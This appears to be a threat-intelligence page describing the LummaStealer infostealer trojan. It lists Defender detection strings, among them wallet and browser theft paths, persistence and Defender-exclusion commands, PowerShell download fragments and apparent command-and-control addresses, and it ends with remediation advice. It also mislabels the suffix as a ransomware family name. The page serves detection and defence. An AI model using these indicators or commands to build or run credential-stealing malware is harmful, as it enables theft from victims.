Trojan:Win64/LummaStealer!rfn

user@threatcheck.sh ~ threat-analysis

bash

$ analyze-threat Trojan:Win64/LummaStealer!rfn

Trojan:Win64/LummaStealer!rfn - Windows Defender threat signature analysis

$ cat analysis.txt

=== THREAT ANALYSIS REPORT ===

Threat Name: Trojan:Win64/LummaStealer!rfn

Classification:

Type:Trojan

Platform:Win64

Family:LummaStealer

Detection Type:Concrete

Known malware family with identified signatures

Suffix:!rfn

Specific ransomware family name

Confidence:Very High

False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 64-bit Windows platform, family LummaStealer

Summary:

This is a concrete detection of the LummaStealer information-stealing trojan. The malware is designed to steal sensitive data from browsers, such as passwords and cookies, cryptocurrency wallet information, and other system details. Technical evidence indicates it targets browser encryption keys, uses persistence mechanisms, and downloads additional payloads.

Severity:

Critical

VDM Static Detection:

Relevant strings associated with this threat:
 - os_crypt.encrypted_key (PEHSTR_EXT)
 - B.imports (PEHSTR_EXT)
 - os_c576xedrypt.encry576xedpted_key (PEHSTR_EXT)
 - Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION (PEHSTR_EXT)
 - fyi/Blogtion.msi (PEHSTR_EXT)
 - ppCmdLine=/QN /norestart (PEHSTR_EXT)
 - atomic.QSY_zrh (PEHSTR_EXT)
 - - Screen Resoluton: (PEHSTR_EXT)
 - TEXTBIN.NET/raw (PEHSTR_EXT)
 - /VERYSILENT /SP- (PEHSTR_EXT)
 - aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT)
 - dKAoMzVdoGMRAuUpnzHLYIx.dll (PEHSTR_EXT)
 - bFISQFXZrlhowSppjMcUMEWMVO.dll (PEHSTR_EXT)
 - sxWsBcgMSxRdUCKXevfJKgAGAKoM.dll (PEHSTR_EXT)
 - qIadkkJWSlcNQdQofhpMzxrd.dll (PEHSTR_EXT)
 - LsVgHFhAfthrvrwvVQnXVYBStlK.dll (PEHSTR_EXT)
 - thoseintroductory.exe (PEHSTR_EXT)
 - callcustomerpro.exe (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\RunOnce (PEHSTR_EXT)
 - GPUView.pdb (PEHSTR_EXT)
 - error_correction_update_check.My.Resources (PEHSTR_EXT)
 - installation_solution_for_use.My.Resources (PEHSTR_EXT)
 - .vuia3 (PEHSTR_EXT)
 - writerfunctionpro.exe (PEHSTR_EXT)
 - timeprogrammer.exe (PEHSTR_EXT)
 - DelNodeRunDLL32 (PEHSTR_EXT)
 - load_world.exe (PEHSTR_EXT)
 - live_stream_from_cosmos_events_app.exe (PEHSTR_EXT)
 - Account/Login (PEHSTR_EXT)
 - WebMatrix.WebData.Resources.WebDataResources (PEHSTR_EXT)
 - LoaderV1.Form1.resources (PEHSTR_EXT)
 - oFYSVYzChxVsXWmRsYqu.dll (PEHSTR_EXT)
 - tzYslkEExBzhWQjYATHOe.dll (PEHSTR_EXT)
 - OdZokoKlJenvDbhTg.dll (PEHSTR_EXT)
 - HeWSfFWuFmmMEQy.dll (PEHSTR_EXT)
 - ILLnogZyZLUtVXiOvwRHpTewBNs.dll (PEHSTR_EXT)
 - VioletRichPlayer364David.ZODvl (PEHSTR_EXT)
 - Revolutionizing connectivity with cutting-edge cloud solutions. (PEHSTR_EXT)
 - OergBcaAGPSxGICMDFJxnj (PEHSTR_EXT)
 - Leading the future of integrated technology solutions. (PEHSTR_EXT)
 - main.RedirectToPayload (PEHSTR_EXT)
 - main.LoadPEModule (PEHSTR_EXT)
 - main.GetNTHdrs (PEHSTR_EXT)
 - main.AllocPEBuffer (PEHSTR_EXT)
 - main.PERawToVirtual (PEHSTR_EXT)
 - main.CreateSuspendedProcess (PEHSTR_EXT)
 - main._LoadPEModule (PEHSTR_EXT)
 - main.Resume_Thread (PEHSTR_EXT)
 - main.Write_ProcessMemory (PEHSTR_EXT)
 - main.Get_ThreadContext (PEHSTR_EXT)
 - Intel Core Inc. Trademark (PEHSTR_EXT)
 - JSylCAgIufPyrE (PEHSTR_EXT)
 - <HTA:APPLICATION icon="#" WINDOWSTATE="normal" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" BORDER="none" SCROLL="no" (PEHSTR_EXT)
 - window.close(); (PEHSTR_EXT)
 - </script> (PEHSTR_EXT)
 - tLrmzJMsrWOFWmoOxcctAcCafzA.d (PEHSTR_EXT)
 - FgLHhdSuJHOQcVWHZfF.d (PEHSTR_EXT)
 - main.Md5Encode (PEHSTR_EXT)
 - main.EUkcKYTIDb (PEHSTR_EXT)
 - main.TerminateProcess (PEHSTR_EXT)
 - main.nlZMziDMqv (PEHSTR_EXT)
 - main.ResumeThread (PEHSTR_EXT)
 - main.WriteProcessMemory (PEHSTR_EXT)
 - main.Wow64SetThreadContext (PEHSTR_EXT)
 - main.GetThreadContext (PEHSTR_EXT)
 - LwNOrAxUVY/main.go (PEHSTR_EXT)
 - main.nwPXANdvbL (PEHSTR_EXT)
 - main.qWwvfeKaCT (PEHSTR_EXT)
 - JustABackDoor\obj\Debug\JustABackDoor.pdb (PEHSTR_EXT)
 - JustABackDoor.Executor (PEHSTR_EXT)
 - RunPowerShellCommand (PEHSTR_EXT)
 - debug.g.resources (PEHSTR_EXT)
 - psicologiaecultura.com.br (PEHSTR_EXT)
 - if ($exeName -eq "RSGame.exe") (PEHSTR_EXT)
 - main.UlhMFyDdoz (PEHSTR_EXT)
 - main.AEKCihaLRV (PEHSTR_EXT)
 - main.uydiOYgQCH.deferwrap2 (PEHSTR_EXT)
 - main.uydiOYgQCH.deferwrap1 (PEHSTR_EXT)
 - main.mOaSjsgDny.func1.Print.1 (PEHSTR_EXT)
 - test_lib/main.go (PEHSTR_EXT)
 - main.qHbLKcVFPY (PEHSTR_EXT)
 - main.BnMWnpUycO (PEHSTR_EXT)
 - main.HFdrQcLRTh (PEHSTR_EXT)
 - main.HwNcTblZxJ (PEHSTR_EXT)
 - main.khgzBwOcdS (PEHSTR_EXT)
 - main.RDF (PEHSTR_EXT)
 - main.cFVvJaclpr (PEHSTR_EXT)
 - main.oepNeSmKgT (PEHSTR_EXT)
 - main.cQPubDNZNj (PEHSTR_EXT)
 - main.neJDPbLRWD (PEHSTR_EXT)
 - main.VZCOQzehCp (PEHSTR_EXT)
 - main.WjLRMuNaor (PEHSTR_EXT)
 - main.EFTcmUgEtT (PEHSTR_EXT)
 - main.faqLSRWRlV (PEHSTR_EXT)
 - main.lnejYwfZkm (PEHSTR_EXT)
 - main.iiQhNBnnfo (PEHSTR_EXT)
 - main.opWGippTfg.deferwrap2 (PEHSTR_EXT)
 - main.opWGippTfg.deferwrap1 (PEHSTR_EXT)
 - main.KqqAVmjanJ (PEHSTR_EXT)
 - main.fQyfTGPUtq (PEHSTR_EXT)
 - exithook/hooks.go (PEHSTR_EXT)
 - main.randSeq (PEHSTR_EXT)
 - main.KwPMHzDibl (PEHSTR_EXT)
 - main._Cfunc_wrf (PEHSTR_EXT)
 - main._RunPE (PEHSTR_EXT)
 - main. (PEHSTR_EXT)
 - .deferwrap2 (PEHSTR_EXT)
 - .deferwrap1 (PEHSTR_EXT)
 - .func1 (PEHSTR_EXT)
 - .func2 (PEHSTR_EXT)
 - .func3 (PEHSTR_EXT)
 - .func4 (PEHSTR_EXT)
 - .func1.Print.1 (PEHSTR_EXT)
 - .rsrc (PEHSTR_EXT)
 - .idata   (PEHSTR_EXT)
 - .rsrc    (PEHSTR_EXT)
 - .func1.Print.func1 (PEHSTR_EXT)
 - complex integrate build quick sun understand network power fast support (PEHSTR_EXT)
 - =.M&o (SNID)
 - database\wirefr\x64\HTTP\Intero.pdb (PEHSTR_EXT)
 - .text (PEHSTR_EXT)
 - `.rdata (PEHSTR_EXT)
 - @.data (PEHSTR_EXT)
 - .00cfg (PEHSTR_EXT)
 - @.reloc (PEHSTR_EXT)
 - B.open (PEHSTR_EXT)
 - fequal.exe (PEHSTR_EXT)
 - .taggant (PEHSTR_EXT)
 - `.rsrc (PEHSTR_EXT)
 - Wallets/Electrum (PEHSTR_EXT)
 - Wallets/ElectronCash (PEHSTR_EXT)
 - %appdata%\com.liberty.jaxx\IndexedDB (PEHSTR_EXT)
 - wallets/Ethereum (PEHSTR_EXT)
 - %localappdata%\Coinomi (PEHSTR_EXT)
 - lid=%s&j=%s&ver=4.0 (PEHSTR_EXT)
 - TeslaBrowser/5.5 (PEHSTR_EXT)
 - Screen.png (PEHSTR_EXT)
 - Screen Resoluton: (PEHSTR_EXT)
 - POST /api HTTP/1.1 (PEHSTR_EXT)
 - %appdata%\com.liberty.jaxx (PEHSTR_EXT)
 - Mail Clients/TheBat (PEHSTR_EXT)
 - Mail Clients/Pegasus (PEHSTR_EXT)
 - Applications/Telegram (PEHSTR_EXT)
 - Applications/1Password (PEHSTR_EXT)
 - Wallets/Daedalus (PEHSTR_EXT)
 - appdata\exodus (PEHSTR_EXT)
 - appdata\binance (PEHSTR_EXT)
 - get-wmiobject-classwin32_computersystem (PEHSTR_EXT)
 - webextension@metamask.io (PEHSTR_EXT)
 - .func6 (PEHSTR_EXT)
 - .func6.1 (PEHSTR_EXT)
 - .func5 (PEHSTR_EXT)
 - .func5.1 (PEHSTR_EXT)
 - .func4.1 (PEHSTR_EXT)
 - .func3.1 (PEHSTR_EXT)
 - .func2.1 (PEHSTR_EXT)
 - .func8 (PEHSTR_EXT)
 - .func7 (PEHSTR_EXT)
 - Software\WinLicense (PEHSTR_EXT)
 - tsrnKMMRWaSmgIGBadTmRDVK.dll (PEHSTR_EXT)
 - EMgVkXRBlViHxiKJoGXomDnkozkr.dll (PEHSTR_EXT)
 - nxtSvXVgJXelyGLBfuddwnihiSLb.dll (PEHSTR_EXT)
 - wDSDpeHhJZHHlukYvJFvIbzlFEz.dll (PEHSTR_EXT)
 - QrUrwtPcnxxkwnxalgzJPWVFgTlT.dll (PEHSTR_EXT)
 - AfSdNM6/46ObIJJmWHHvpVJ (PEHSTR_EXT)
 - Tm5McYSCxHrGi4S+xs0dRKxy+8/OKxRNXx1SEPQEI804Dz4Y8PunFang (PEHSTR_EXT)
 - TextForm\obj\Debug\TextForm.pdb (PEHSTR_EXT)
 - Dwasakj.Properties.Resources (PEHSTR_EXT)
 - file:/// (PEHSTR_EXT)
 - main.CocLYFOOoa (PEHSTR_EXT)
 - main.lFDfigPOFq (PEHSTR_EXT)
 - main.CONTEXT (PEHSTR_EXT)
 - main.ISLAdTJUKL (PEHSTR_EXT)
 - I02Op2e6ZD52OJInVolF/WhWwGUgukvawTLHcS4qp (PEHSTR_EXT)
 - PWGVuoIBdb/core_injector.go (PEHSTR_EXT)
 - PWGVuoIBdb/injection.go (PEHSTR_EXT)
 - Charter.exe (PEHSTR_EXT)
 - "p": "%appdata%\\Ethereum", (PEHSTR_EXT)
 - "p": "%appdata%\\Bitcoin\wallets", (PEHSTR_EXT)
 - "p": "%localappdata%\\Microsoft\\Edge\\User Data", (PEHSTR_EXT)
 - "z": "Wallets/Bitcoin core", (PEHSTR_EXT)
 - "z": "Wallets/DashCore", (PEHSTR_EXT)
 - "n": "chrome.exe", (PEHSTR_EXT)
 - @.idata (PEHSTR_EXT)
 - aeblfdkhhhdcdjpifhhbdiojplfjncoa (PEHSTR_EXT)
 - src\executable_loader.rs (PEHSTR)
 - WinHttpWriteData (PEHSTR_EXT)
 - powershell -Command "Add-MpPreference -ExclusionPath (PEHSTR_EXT)
 - powershell -Command "Invoke-WebRequest -Uri (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb (PEHSTR_EXT)
 - /.exe" -Force (PEHSTR_EXT)
 - ExecutionPolicyRead after Close (PEHSTR_EXT)
 - 127.0.0.1:53 (PEHSTR_EXT)
 - Command (PEHSTR_EXT)
 - SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - Js) (SNID)
 - reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v AdobeUpdater /t REG_SZ /d "%s" /f (PEHSTR_EXT)
 - cmd.exe /c (PEHSTR_EXT)
 - %userappdata%\RestartApp.exe (PEHSTR_EXT)
 - \\.\Oreans.vxd (PEHSTR_EXT)
 - .idata (PEHSTR_EXT)
 - SOFTWARE\WinLicense (PEHSTR_EXT)
 - /61GM (SNID)
 - Realtek_HD_Audio_Universal_Service_Driver.exe (PEHSTR_EXT)
 - -NoProfile -ExecutionPolicy Bypass -Command " (PEHSTR_EXT)
 - p://141.98.6.130:5554/ (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 - p://84.21.189.22:5554/ (PEHSTR_EXT)
 - DownloaderApp.exe (PEHSTR_EXT)
 - .svG  (SNID)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Known malware which is associated with this threat:

Filename: 17f1708d36917a3095a76e3c6dc49d345fb0d95309894ca3ac54097f2e22d104

17f1708d36917a3095a76e3c6dc49d345fb0d95309894ca3ac54097f2e22d104

04/12/2025

→VirusTotal ↓Download Sample

Remediation Steps:

Isolate the device from the network immediately. Run a full antivirus scan to remove the threat. Assume all credentials (passwords, session cookies, cryptocurrency wallets) on the machine have been compromised; change all passwords and revoke active sessions from a separate, clean device. Consider reinstalling the operating system.

=== END REPORT ===

$ reanalyze-threat

This analysis was last updated on 04/12/2025. Do you want to analyze it again?

$ ls available-commands/

→ cd /home

user@threatcheck.sh:~$ ▊

Trojan:Win64/LummaStealer!rfn - Windows Defender Threat Analysis